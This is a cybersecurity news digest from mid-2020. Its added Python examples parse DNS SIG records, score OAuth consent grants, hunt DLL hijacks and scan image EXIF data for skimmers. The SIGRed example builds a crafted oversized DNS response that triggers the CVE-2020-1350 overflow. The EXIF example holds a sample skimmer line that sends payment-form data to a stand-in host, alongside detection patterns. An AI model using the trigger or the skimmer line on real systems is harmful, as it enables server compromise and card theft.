Blueliv Intelligence Briefing

Your cybersecurity news summary

Wednesday, July 15th, 2020

Welcome to today’s intelligence briefing, covering noteworthy items on the cybersecurity news agenda.

Find these stories on the Blueliv Threat Exchange Network, a global community of thousands of cybersecurity experts, IT professionals and academics. Membership is free.

Read the latest research blogs from the Blueliv Labs team.

Microsoft patches a 17-year-old “wormable” vulnerability in Windows DNS Server

Microsoft's July 2020 Patch Tuesday fixes CVE-2020-1350, a critical (CVSS 10.0) remote code execution flaw that has existed in the Windows DNS Server role for 17 years. Check Point, which found the bug and named it SIGRed, says that by exploiting it "a hacker [can] craft malicious DNS queries to Windows DNS servers, and achieve arbitrary code execution that could lead to the breach of the entire infrastructure." CVE-2020-1350 affects all Windows Server versions from 2003 to 2019 that run the DNS Server role, which in most Active Directory environments means the domain controllers. It is wormable: exploitation needs neither authentication nor user interaction, and one compromised DNS server can be used to attack the next. The bug is in how the server parses DNS data it receives, specifically a SIG resource record in the response to a query it has forwarded upstream: the attacker queries the victim server for a domain they control, the server forwards the query to the attacker's name server, and the malicious response, carried over TCP because it is larger than UDP allows, triggers a 16-bit integer overflow and a heap buffer overflow in the DNS service, which runs as SYSTEM. Microsoft documented a registry workaround for servers that cannot be patched immediately: set the DWORD value TcpReceivePacketSize under HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters to 0xFF00 and restart the DNS service, which caps the size of DNS-over-TCP messages the server accepts.
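As an added example (not code from the page, from Microsoft or from Check Point), the Python below parses a DNS-over-TCP response as far as its first SIG record and applies the two checks this bug class needs: decompression of the signer's name with bounds checks, and a record-size computation done in wide arithmetic before it is compared with the 16-bit limit. The 64 KB response, the 32-byte in-memory record header (RECORD_HDR_LEN) and the two size functions are constructed for illustration; Check Point's write-up attributes the real flaw to a 16-bit overflow when the server sizes the record, and the exact layout of that computation is theirs, not reproduced here.

```python
import struct

TYPE_SIG = 24          # RFC 2535 SIG resource record, the type SIGRed abused
CLASS_IN = 1
SIG_FIXED_LEN = 18     # type covered(2) algorithm(1) labels(1) original TTL(4)
                       # expiration(4) inception(4) key tag(2); then signer's name, signature
MAX_NAME_LEN = 255     # RFC 1035 limit on a decompressed name
MAX_TCP_DNS = 0xFFFF   # DNS over TCP carries a 16-bit length prefix
RECORD_HDR_LEN = 32    # ASSUMED in-memory record header; illustrative, not the server's layout


class DnsParseError(ValueError):
    pass


def read_name(msg: bytes, off: int) -> tuple:
    """Decompress the name at msg[off:]. Returns (uncompressed wire-format name,
    offset just past the name as it appeared on the wire)."""
    out = bytearray()
    while True:
        if off >= len(msg):
            raise DnsParseError("name runs past end of message")
        length = msg[off]
        if length & 0xC0 == 0xC0:                 # two-byte compression pointer
            if off + 2 > len(msg):
                raise DnsParseError("truncated compression pointer")
            ptr = struct.unpack_from("!H", msg, off)[0] & 0x3FFF
            if ptr >= off:                        # only backward pointers are legal, so no loops
                raise DnsParseError("forward or self-referencing compression pointer")
            target, _ = read_name(msg, ptr)
            out += target
            off += 2
            break
        if length > 63 or off + 1 + length > len(msg):
            raise DnsParseError("bad label length")
        out += msg[off:off + 1 + length]
        off += 1 + length
        if length == 0:                           # root label terminates the name
            break
    if len(out) > MAX_NAME_LEN:
        raise DnsParseError("decompressed name longer than 255 octets")
    return bytes(out), off


def sig_record_size(msg: bytes, rdata_off: int, rdlength: int) -> int:
    """Size of the SIG record once the signer's name is decompressed, computed in
    Python's unbounded integers. A fixed-width implementation must check this
    value before narrowing it to 16 bits."""
    end = rdata_off + rdlength
    if rdlength < SIG_FIXED_LEN or end > len(msg):
        raise DnsParseError("RDLENGTH does not fit the message")
    signer, after = read_name(msg, rdata_off + SIG_FIXED_LEN)
    if after > end:
        raise DnsParseError("signer's name overruns RDATA")
    return RECORD_HDR_LEN + SIG_FIXED_LEN + len(signer) + (end - after)


def narrowed_size_16bit(size: int) -> int:
    # What the same size becomes in a 16-bit variable: the bug class behind SIGRed.
    return size & 0xFFFF


def check_tcp_response(frame: bytes) -> int:
    """Parse a TCP-framed DNS response up to its first answer and return the
    validated record size; raise DnsParseError when any invariant is violated."""
    if len(frame) < 2:
        raise DnsParseError("missing TCP length prefix")
    msg = frame[2:]
    if struct.unpack_from("!H", frame, 0)[0] != len(msg):
        raise DnsParseError("TCP length prefix disagrees with payload")
    hdr = struct.unpack_from("!HHHHHH", msg, 0)   # id, flags, QD, AN, NS, AR
    off = 12
    for _ in range(hdr[2]):
        _, off = read_name(msg, off)
        off += 4                                  # QTYPE, QCLASS
    if hdr[3] == 0:
        raise DnsParseError("no answer record")
    _, off = read_name(msg, off)                  # owner name of the first answer
    rtype, _rclass, _ttl, rdlength = struct.unpack_from("!HHIH", msg, off)
    off += 10
    if rtype != TYPE_SIG:
        raise DnsParseError("first answer is not a SIG record")
    size = sig_record_size(msg, off, rdlength)
    if size > MAX_TCP_DNS:
        raise DnsParseError("decompressed SIG record does not fit a 16-bit size")
    return size


def build_oversized_sig_response() -> bytes:
    """Constructed 64 KB response: a 255-octet owner name and a SIG record whose
    signer's name is a 2-byte pointer back to it. The record fits on the wire;
    decompressed and prefixed with the record header it exceeds 16 bits."""
    owner = b"".join(bytes([63]) + b"a" * 63 for _ in range(3)) + bytes([61]) + b"b" * 61 + b"\x00"
    header = struct.pack("!HHHHHH", 0x1234, 0x8180, 1, 1, 0, 0)
    question = b"\x00" + struct.pack("!HH", TYPE_SIG, CLASS_IN)      # root name, QTYPE SIG
    owner_off = len(header) + len(question)
    fixed = struct.pack("!HBBIIIH", TYPE_SIG, 13, 4, 3600, 0x60000000, 0x5F000000, 0x1234)
    signer_ptr = struct.pack("!H", 0xC000 | owner_off)
    overhead = len(header) + len(question) + len(owner) + 10 + len(fixed) + len(signer_ptr)
    signature = b"\x41" * (MAX_TCP_DNS - overhead)                   # fill to exactly 65535 bytes
    rdata = fixed + signer_ptr + signature
    answer = owner + struct.pack("!HHIH", TYPE_SIG, CLASS_IN, 3600, len(rdata))
    msg = header + question + answer + rdata
    return struct.pack("!H", len(msg)) + msg
```

On the constructed message the wire RDLENGTH is 65253 and fits a 16-bit field, but the decompressed record comes to 65538, which narrows to 2; the checked parser rejects it instead. Microsoft's TcpReceivePacketSize workaround attacks the same precondition from the other side, by refusing TCP messages large enough to make the sum overflow.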

Tuesday, July 14th, 2020

RECON bug in SAP NetWeaver, affecting over 40,000 customers, patched

RECON, short for Remotely Exploitable Code On NetWeaver, is tracked as CVE-2020-6287 and carries the maximum CVSS score of 10 out of 10. According to Onapsis, the company that found the bug and responsibly disclosed it to the SAP Security Response Team, it can be exploited remotely by unauthenticated attackers to fully compromise unpatched SAP systems, and more than 40,000 customers are estimated to be exposed. The root cause is a missing authentication check in a web component of SAP NetWeaver AS for Java, the LM Configuration Wizard, which allows several high-privileged actions on the affected system, including creating a new SAP user with maximum privileges. SAP fixed the issue in Security Note 2934135 and CISA issued an alert urging immediate patching; where the patch cannot be applied at once, disabling the LM Configuration Wizard service is the documented mitigation.

Thursday, July 9th, 2020

New severe vulnerability addressed by Palo Alto Networks

CVE-2020-2034 is an OS command injection in the PAN-OS GlobalProtect portal. It is rated high severity with a CVSS 3.x base score of 8.1, can be exploited by an attacker with network access to the portal and needs no user interaction; it stops short of a critical rating only because the attacker requires some knowledge of the target firewall. "An OS Command Injection vulnerability in the PAN-OS GlobalProtect portal allows an unauthenticated network-based attacker to execute arbitrary OS commands with root privileges," reads the advisory published by Palo Alto Networks. The issue cannot be exploited on firewalls where the GlobalProtect portal feature is not enabled, and it is fixed in PAN-OS 8.1.15, 9.0.9 and 9.1.3 and later.

Code execution vulnerability in GeForce Experience fixed

This week, Nvidia said the security flaw, CVE-2020-5964, is in the service host component of GeForce Experience, "in which the integrity check of application resources may be missed." Because application resources are not verified properly, a local attacker can tamper with them to compromise the software, leading to code execution, denial of service or information disclosure. Rated CVSS 6.5, the vulnerability affects all Windows versions of GeForce Experience prior to 3.20.4, which contains the fix.

Wednesday, July 8th, 2020

Six domains used in phishing scheme seized by Microsoft

The US District Court for the Eastern District of Virginia has ruled that Microsoft can seize six domains that were being used in a widespread phishing campaign. Microsoft said the campaign targeted users in sixty-two countries, first with business-themed lures and later capitalizing on fears surrounding COVID-19. Notably, the attackers did not use credential-harvesting login portals to trick victims into entering their usernames and passwords. Instead, the emails contained links that requested OAuth permissions for a malicious web application impersonating Office 365; once a user clicked "Accept", the attacker held an access token for the user's mail and files that is unaffected by a password reset and does not pass through multi-factor authentication. Tenants reduce their exposure by restricting which applications users may consent to and by reviewing the consent grants already in place.
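The campaign's trick was an OAuth consent grant rather than a stolen password, so the record worth watching is the tenant's consent audit trail rather than failed sign-ins. The Python below is an added example (not Microsoft's code and not from the page) that scores simplified consent events the way an analyst would triage them: the record layout, user and app names, tenant identifiers and scope lists are constructed to resemble what an Azure AD "Consent to application" audit entry carries, and the high-risk scope list and trusted-publisher allowlist are assumptions a tenant would replace with its own.

```python
import re
from dataclasses import dataclass, field

# Delegated Microsoft Graph scopes that give an app standing access to mail and files.
# ASSUMED set for this example, not an official list.
HIGH_RISK_SCOPES = {
    "Mail.Read", "Mail.ReadWrite", "Mail.Send", "MailboxSettings.ReadWrite",
    "Files.Read.All", "Files.ReadWrite.All", "Contacts.Read", "offline_access",
}
# Name fragments a lure app borrows to look like a first-party Microsoft app.
BRAND_LURE = re.compile(r"(office\s*365|microsoft|outlook|sharepoint|teams)", re.I)
# Publisher tenant IDs the organisation trusts (constructed value).
TRUSTED_PUBLISHER_TENANTS = {"aaaaaaaa-0000-4000-8000-000000000001"}


@dataclass
class ConsentEvent:
    user: str
    app_display_name: str
    app_id: str
    publisher_tenant: str
    publisher_verified: bool
    consent_type: str          # "Principal": one user consented; "AllPrincipals": an admin did
    scopes: list = field(default_factory=list)
    reply_url: str = ""


@dataclass
class Finding:
    user: str
    app_display_name: str
    score: int
    reasons: list


def score_consent(ev: ConsentEvent) -> Finding:
    """Add up the signals that made this campaign's grants dangerous."""
    if ev.publisher_tenant in TRUSTED_PUBLISHER_TENANTS:
        return Finding(ev.user, ev.app_display_name, 0, ["trusted publisher"])
    score, reasons = 0, []
    risky = sorted(HIGH_RISK_SCOPES & set(ev.scopes))
    if risky:
        score += 3
        reasons.append("high-risk delegated scopes: " + ", ".join(risky))
    if "offline_access" in ev.scopes and ev.consent_type == "Principal":
        score += 2            # a refresh token keeps working after the password is reset
        reasons.append("user-level consent with offline_access (persistent refresh token)")
    if BRAND_LURE.search(ev.app_display_name):
        score += 3
        reasons.append("display name imitates a Microsoft first-party app")
    if not ev.publisher_verified:
        score += 1
        reasons.append("publisher not verified")
    if ev.reply_url and not ev.reply_url.startswith("https://"):
        score += 1
        reasons.append("non-HTTPS redirect URI")
    return Finding(ev.user, ev.app_display_name, score, reasons)


def triage(events: list, threshold: int = 5) -> list:
    """Findings at or above the threshold, worst first."""
    hits = [f for f in (score_consent(e) for e in events) if f.score >= threshold]
    return sorted(hits, key=lambda f: -f.score)


# Constructed sample consent events; not real audit log data.
SAMPLE_EVENTS = [
    ConsentEvent("alice@example.com", "Office 365 Secure Mail",
                 "11111111-aaaa-4bbb-8ccc-000000000001", "22222222-aaaa-4bbb-8ccc-000000000002",
                 False, "Principal",
                 ["User.Read", "Mail.Read", "Files.ReadWrite.All", "offline_access"],
                 "https://mail-security-update.example/callback"),
    ConsentEvent("bob@example.com", "Expense Reporter",
                 "33333333-aaaa-4bbb-8ccc-000000000003", "44444444-aaaa-4bbb-8ccc-000000000004",
                 True, "AllPrincipals", ["User.Read", "openid", "profile"],
                 "https://expenses.example/auth"),
    ConsentEvent("carol@example.com", "Microsoft Teams",
                 "55555555-aaaa-4bbb-8ccc-000000000005", "aaaaaaaa-0000-4000-8000-000000000001",
                 True, "Principal", ["Chat.Read", "offline_access"], "https://teams.example/"),
]
```

The lure grant scores 9 on four independent signals and is the only event that survives triage; the point of scoring rather than matching a single field is that an attacker can fix the publisher or the name, but not ask for less than the mailbox access the fraud needs.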

Tuesday, July 7th, 2020

Credit card skimmer targets ASP.NET sites hosted on Microsoft IIS servers

Most websites targeted by digital skimmers are built on the LAMP stack (Linux, Apache, MySQL and PHP), because those technologies are widely adopted and criminals follow the rule of highest return for the least effort. Researchers at Malwarebytes have identified a rare exception: a credit card skimming campaign that exclusively targets websites hosted on Microsoft IIS servers running the ASP.NET web application framework.

Microsoft vulnerabilities have been added to the Purple Fox EK

The Purple Fox EK was first analyzed in September 2019, when researchers said it appeared to have been built to replace the Rig EK in the distribution chain of the Purple Fox malware, a trojan/rootkit. The latest revision adds exploits for CVE-2020-0674 (a scripting engine memory corruption in Internet Explorer, disclosed in January 2020) and CVE-2019-1458 (a Win32k elevation-of-privilege flaw, disclosed in December 2019). Purple Fox previously used exploits for older Microsoft flaws, including CVE-2018-8120 and CVE-2015-1701, both Win32k elevation-of-privilege bugs.

Android malware distributed via smishing: FakeSpy

The attackers are using smishing to trick victims into installing spoofed apps. "The malware uses smishing, or SMS phishing, to infiltrate target devices, which is a technique that relies on social engineering," researchers at Cybereason explain. "The attackers send fake text messages to lure the victims to click on a malicious link. The link directs them to a malicious web page, which prompts them to download an Android application package (APK)..." New versions of FakeSpy masquerade as government post office apps and transportation services apps.

Friday, July 3rd, 2020

Communications system used by criminals to trade drugs and guns “successfully penetrated”

The NCA worked with forces across Europe on the UK's "biggest and most significant" law enforcement operation. Major crime figures were among over 800 Europe-wide arrests after messages on EncroChat were intercepted and decoded. More than two tonnes of drugs, several dozen guns and £54m in suspect cash have been seized, says the NCA. While the NCA was part of the investigation, it was initiated and led by French and Dutch police, and also involved Europol.

DarkCrewBot – The Return of the Bot Shop Crew

Researchers at Check Point recently discovered an ongoing, evolving campaign from a known hacking group, "DarkCrewFriends." The campaign targets PHP servers and focuses on building a botnet infrastructure that can be leveraged for several purposes, such as monetization and taking down critical services. DarkCrewFriends has been quite active over the last few years.

Connection discovered between Chinese hacker group APT15 and defense contractor

A report by Lookout details a years-long hacking campaign that has primarily targeted the Uyghur ethnic minority in western China, and to a lesser degree the Tibetan community. The campaign infected members of these communities with Android surveillance malware, allowing government-backed hackers to monitor minority communities in China's border regions as well as their diaspora in at least 14 other countries. Lookout links the tooling and infrastructure to the APT15 group and to a Chinese defense contractor, Xi'an Tianhe Defense Technology.

Thursday, July 2nd, 2020

Emergency Firefox update for search issues

After releasing Firefox 78 yesterday, Mozilla quickly halted its rollout via automatic updates due to problems discovered with the built-in search functionality. Today, Mozilla has released version 78.0.1 to fix these issues and has resumed auto-updates. In a Mozilla bug report, numerous search issues were reported after installing Firefox 78.

Netgear releases fixes for ten vulnerabilities affecting nearly 80 of its products

Four of the flaws are rated high severity: they can be exploited by an unauthenticated attacker with network access to a vulnerable Netgear device to execute arbitrary code with admin or root privileges, or to bypass authentication. The US Cybersecurity and Infrastructure Security Agency (CISA) published a security alert warning of the Netgear router flaws, and the CERT/CC published an advisory on one of them, which an unauthenticated attacker can exploit for remote code execution with root privileges.

Wednesday, July 1st, 2020

Out-of-band security updates to patch two vulnerabilities in Microsoft Windows

The two vulnerabilities are tracked as CVE-2020-1425, rated critical, and CVE-2020-1457, rated important. Both are remote code execution issues caused by the way the Microsoft Windows Codecs Library handles objects in memory, and both are triggered by a specially crafted image file. Successful exploitation of CVE-2020-1425 lets attackers "obtain information to further compromise the user's system," while successful exploitation of CVE-2020-1457 leads to arbitrary code execution on vulnerable systems. The affected library ships as the HEVC Video Extensions package, so the fix is delivered through the Microsoft Store's automatic updates rather than Windows Update; organisations that block Store access need to verify the installed package version themselves.

Tuesday, June 30th, 2020

PROMETHIUM extends global reach with StrongPity3 APT

The PROMETHIUM threat actor, active since 2012, has been exposed multiple times over the past several years. That has not deterred it from continuing and expanding its activities. By matching indicators such as code similarity, command and control (C2) paths, toolkit structure and malicious behavior, Cisco Talos has identified around 30 new C2 domains. Talos assesses that, clustered by domain creation month and year, PROMETHIUM activity falls into five distinct peaks.

Monday, June 29th, 2020

Almost 300 Windows 10 executables vulnerable to DLL hijacking

Almost 300 executables in the System32 folder of Windows 10 are vulnerable to relative-path DLL hijacking, according to a new report by PwC UK security researcher Wietze Beukema. An executable that loads a DLL by name rather than by full path will take a copy placed in its own directory, so a copy of a trusted System32 executable next to a malicious DLL of the expected name gives code execution under the identity of a Windows-signed binary. Some of these executables auto-elevate, and Beukema shows that with a simple VBScript a few of them can be used to gain administrative privileges and bypass UAC entirely.
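Beukema's list is a list of executables; what a defender can act on is the load itself. The Python below is an added example (not the researcher's code and not from the article) of the detection logic commonly run over Sysmon Event ID 7 (Image Loaded) records: a DLL whose file name matches one shipped in System32, loaded from outside the Windows system directories, is the signature of a relative-path hijack. The event records, the DLL name list and the system directory list are constructed for illustration (a real hunt takes the DLL names from an inventory of a reference System32). The last record uses a directory name with a trailing space after "Windows", the look-alike of the trusted directory that the UAC bypass relies on, and shows why the path check has to be an exact prefix comparison.

```python
from dataclasses import dataclass
from pathlib import PureWindowsPath
from typing import List, Optional, Tuple

# Directories a Windows system DLL is expected to load from (ASSUMED list for this example).
SYSTEM_DIRS = (r"C:\Windows\System32", r"C:\Windows\SysWOW64", r"C:\Windows\WinSxS")
# Constructed subset of DLL names that live in System32; a real hunt uses a full inventory.
SYSTEM32_DLLS = {"version.dll", "dwmapi.dll", "cryptbase.dll", "profapi.dll", "userenv.dll"}


@dataclass(frozen=True)
class ImageLoad:
    """The fields of a Sysmon Event ID 7 (Image Loaded) record this check needs."""
    image: str            # process executable
    image_loaded: str     # DLL that was mapped
    signed: bool
    signature: str        # signer subject, empty if unsigned
    user: str


def under_dir(path: str, root: str) -> bool:
    """True when path lies under root: an exact, case-insensitive prefix with the separator,
    so a look-alike such as 'C:\\Windows \\System32' (trailing space) does not pass."""
    return path.lower().startswith(root.lower().rstrip("\\") + "\\")


def classify(ev: ImageLoad) -> Optional[str]:
    """Return the reasons a load looks like a DLL hijack, or None when it looks normal."""
    dll, exe = PureWindowsPath(ev.image_loaded), PureWindowsPath(ev.image)
    if dll.name.lower() not in SYSTEM32_DLLS:
        return None                               # not a system DLL name; out of scope here
    if any(under_dir(ev.image_loaded, d) for d in SYSTEM_DIRS):
        return None                               # loaded from where it belongs
    reasons = ["system DLL name loaded from outside the system directories"]
    if not (ev.signed and "microsoft" in ev.signature.lower()):
        reasons.append("unsigned or not Microsoft-signed")
    if str(dll.parent).lower() == str(exe.parent).lower():
        reasons.append("DLL sits beside the executable (relative-path hijack pattern)")
    if not any(under_dir(ev.image, d) for d in SYSTEM_DIRS):
        reasons.append("executable itself runs from outside the system directories")
    return "; ".join(reasons)


def hunt(events: List[ImageLoad]) -> List[Tuple[ImageLoad, str]]:
    """Every event that classify() flags, paired with its reasons."""
    hits = []
    for ev in events:
        reason = classify(ev)
        if reason:
            hits.append((ev, reason))
    return hits


# Constructed sample records, not real telemetry.
SAMPLE_EVENTS = [
    ImageLoad(r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\version.dll",
              True, "Microsoft Windows", "NT AUTHORITY\\SYSTEM"),
    ImageLoad(r"C:\Users\bob\AppData\Local\Temp\winver.exe",
              r"C:\Users\bob\AppData\Local\Temp\dwmapi.dll", False, "", "CORP\\bob"),
    ImageLoad(r"C:\Program Files\Vendor\app.exe", r"C:\Program Files\Vendor\vendorcore.dll",
              True, "Vendor Inc", "CORP\\alice"),
    # Look-alike directory with a trailing space after "Windows"
    ImageLoad(r"C:\Windows \System32\winver.exe", r"C:\Windows \System32\dwmapi.dll",
              False, "", "CORP\\bob"),
]
```

Two of the four constructed loads are flagged: the copy in a temp directory and the one from the look-alike directory. Third-party software that legitimately ships a DLL with a system name will also match and needs an allowlist keyed on the signer, which is why the signature is carried through into the reasons.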

Friday, June 26th, 2020

GuLoader: Peering Into a Shellcode-based Downloader

GuLoader, a malware family that emerged in the wild late last year, is written in Visual Basic 6 (VB6), but the VB6 code is only a wrapper: the core payload is implemented as shellcode. It is distributed via spam email campaigns with archived attachments that contain the malware. Most of what GuLoader downloads is commodity malware, with AgentTesla, FormBook and NanoCore the most prevalent. The downloader typically stores its encrypted payloads on Google Drive.

Hackers hide credit card stealing scripts in favicon EXIF data

Hackers keep evolving their tactics to stay one step ahead of security companies. A good example is the hiding of a credit card stealing script in the EXIF data of a favicon image to evade detection. In a new report by Malwarebytes, an online store using the WordPress WooCommerce plugin was found to be infected with a Magecart script that steals customers' credit cards. What made this attack stand out was that the script capturing data from the payment form was not added directly to the site but was contained in the EXIF data of a favicon image hosted on a remote site.

Web skimmer hides within EXIF metadata, exfiltrates credit cards via image files

They say a picture is worth a thousand words. Threat actors must have remembered that as they devised yet another way to hide their credit card skimmer in order to evade detection. Researchers found skimming code hidden within the metadata of an image file (a form of steganography) and surreptitiously loaded by compromised online stores. This scheme would not be complete without yet another variation to exfiltrate stolen credit card data.
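Both items above describe the same technique from two sources: skimmer JavaScript carried in the EXIF metadata of an image and pulled out by a loader script on the checkout page. The Python below is an added example (not Malwarebytes' code and not from either article) of the defender's side: a minimal reader for the Exif APP1 segment of a JPEG that returns its ASCII tags, and a heuristic that flags JavaScript-looking content in fields that should hold plain text. The JPEG is constructed inline and is not a real skimmer sample; the Copyright tag (0x8298) is the field where Malwarebytes reported the script, and the indicator list is an assumption.

```python
import re
import struct

TAG_NAMES = {0x010E: "ImageDescription", 0x010F: "Make", 0x0110: "Model",
             0x0131: "Software", 0x013B: "Artist", 0x8298: "Copyright"}
EXIF_ASCII = 2          # TIFF field type for NUL-terminated ASCII
# Fragments that belong in a script, not in a copyright notice (ASSUMED indicator list).
JS_INDICATORS = re.compile(
    r"(eval\(|atob\(|document\.(createElement|getElementsBy\w+|forms)|new Image\(|"
    r"addEventListener\(|XMLHttpRequest|fetch\(|\.src\s*=)", re.I)


def jpeg_segments(data: bytes):
    """Yield (marker, payload) for each length-prefixed segment before the scan data."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("not a JPEG (missing SOI)")
    off = 2
    while off + 4 <= len(data):
        if data[off] != 0xFF:
            raise ValueError("marker expected at offset %d" % off)
        marker = data[off + 1]
        if marker in (0xDA, 0xD9):          # SOS or EOI: no more metadata segments
            return
        (length,) = struct.unpack_from(">H", data, off + 2)
        payload = data[off + 4:off + 2 + length]
        if len(payload) != length - 2:
            raise ValueError("truncated segment")
        yield marker, payload
        off += 2 + length


def _parse_ifd0(tiff: bytes) -> dict:
    """ASCII tags of IFD0 in a TIFF block (the body of an Exif APP1 segment)."""
    endian = {b"II": "<", b"MM": ">"}.get(tiff[:2])
    if endian is None or struct.unpack_from(endian + "H", tiff, 2)[0] != 0x2A:
        raise ValueError("bad TIFF header")
    (ifd_off,) = struct.unpack_from(endian + "I", tiff, 4)
    (count,) = struct.unpack_from(endian + "H", tiff, ifd_off)
    tags = {}
    for i in range(count):
        entry = ifd_off + 2 + 12 * i
        tag, typ, n = struct.unpack_from(endian + "HHI", tiff, entry)
        if typ != EXIF_ASCII:
            continue
        # values of four bytes or fewer are stored inline; longer ones via an offset
        start = entry + 8 if n <= 4 else struct.unpack_from(endian + "I", tiff, entry + 8)[0]
        if start + n > len(tiff):
            raise ValueError("ASCII tag 0x%04X points outside the TIFF block" % tag)
        raw = tiff[start:start + n].split(b"\x00", 1)[0]
        tags[TAG_NAMES.get(tag, "0x%04X" % tag)] = raw.decode("latin-1")
    return tags


def exif_ascii_tags(jpeg: bytes) -> dict:
    """ASCII Exif tags of a JPEG, or {} when it carries no Exif APP1 segment."""
    for marker, payload in jpeg_segments(jpeg):
        if marker == 0xE1 and payload.startswith(b"Exif\x00\x00"):
            return _parse_ifd0(payload[6:])
    return {}


def suspicious_tags(tags: dict) -> dict:
    """Metadata fields whose content looks like JavaScript rather than text."""
    return {k: v for k, v in tags.items() if JS_INDICATORS.search(v)}


def build_jpeg_with_copyright(text: bytes) -> bytes:
    """Constructed minimal JPEG: SOI, an Exif APP1 segment with one Copyright tag, EOI."""
    value = text + b"\x00"
    ifd_off = 8
    data_off = ifd_off + 2 + 12 + 4                   # count + one entry + next-IFD pointer
    entry = struct.pack("<HHII", 0x8298, EXIF_ASCII, len(value), data_off)
    tiff = (b"II" + struct.pack("<HI", 0x2A, ifd_off) + struct.pack("<H", 1)
            + entry + struct.pack("<I", 0) + value)
    app1 = b"Exif\x00\x00" + tiff
    return b"\xff\xd8\xff\xe1" + struct.pack(">H", len(app1) + 2) + app1 + b"\xff\xd9"


# Constructed sample: a "copyright notice" that is really a skimmer loader. Not a real sample.
SAMPLE_PAYLOAD = (b"Copyright (c) 2020 Example Store. var i=new Image();"
                  b"i.src='https://cdn.example/c.gif?d='+btoa(document.forms[0].innerText);")
```

Run over every image a store's pages load, including the favicon and anything fetched from third-party hosts, this turns the steganographic hiding place into a cheap indicator: a Copyright, Artist or ImageDescription field that contains a function call is not a copyright notice.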

Thursday, June 25th, 2020

Lucifer: New Cryptojacking and DDoS Hybrid Malware Exploiting High and Critical Vulnerabilities to Infect Windows Devices

A new variant of a powerful cryptojacking and DDoS malware is exploiting severe vulnerabilities in order to infect Windows machines. Dubbed Lucifer, the malware is part of an active campaign against Windows hosts and uses a variety of weaponized exploits in the latest wave of attacks, Palo Alto Networks' Unit 42 said on Wednesday.

CryptoCore: a threat actor targeting cryptocurrency exchanges

A hacking group known as CryptoCore has pulled off cryptocurrency heists worth $70 million, and research by ClearSky indicates the total may exceed $200 million since 2018. The group targets cryptocurrency exchanges by running spear-phishing campaigns against their employees and executives. The main goal of CryptoCore's heists is access to the exchanges' wallets, whether general corporate wallets or wallets belonging to the exchange's employees.

New ransomware posing as COVID‑19 tracing app targets Canada

New ransomware, CryCryptor, has been targeting Android users in Canada, distributed via two websites under the guise of an official COVID-19 tracing app provided by Health Canada. ESET researchers analyzed the ransomware and created a decryption tool for the victims. CryCryptor surfaced just a few days after the Canadian government officially announced its intention to back the development of a nation-wide, voluntary tracing app called COVID Alert.

Tuesday, June 23rd, 2020

Inside a TrickBot Cobalt Strike Attack Server

TrickBot is the successor of Dyre. At first it was focused primarily on banking fraud, even reusing the same web-injection system Dyre used, but over the years it has shifted its focus to enterprise environments, incorporating network profiling, mass data collection and lateral movement exploits. That shift is evident in its follow-on payloads, which target enterprise environments.

Monday, June 22nd, 2020

Dark Basin: uncovering a massive hack-for-hire operation

Citizen Lab researchers give the name Dark Basin to a hack-for-hire organization that has targeted thousands of individuals and organizations on six continents, including senior politicians, government prosecutors, CEOs, journalists and human rights defenders. With high confidence, they link Dark Basin to BellTroX InfoTech Services, an India-based technology company. Over the course of a multi-year investigation, they found that Dark Basin likely conducted commercial espionage on behalf of its clients against opponents involved in high-profile public events, criminal cases, financial transactions, news stories and advocacy.

Malwarebytes causing performance issues in Windows 10 2004

Since the release of Windows 10 version 2004, the May 2020 Update, users have been reporting performance issues and crashes when Malwarebytes 4.1 is installed. In numerous reports to the Malwarebytes support forums, users describe problems with MBAM 4.1 installed ranging from random freezes, general slowness and video stuttering to blue screen of death (BSOD) crashes and Windows 10 becoming unresponsive.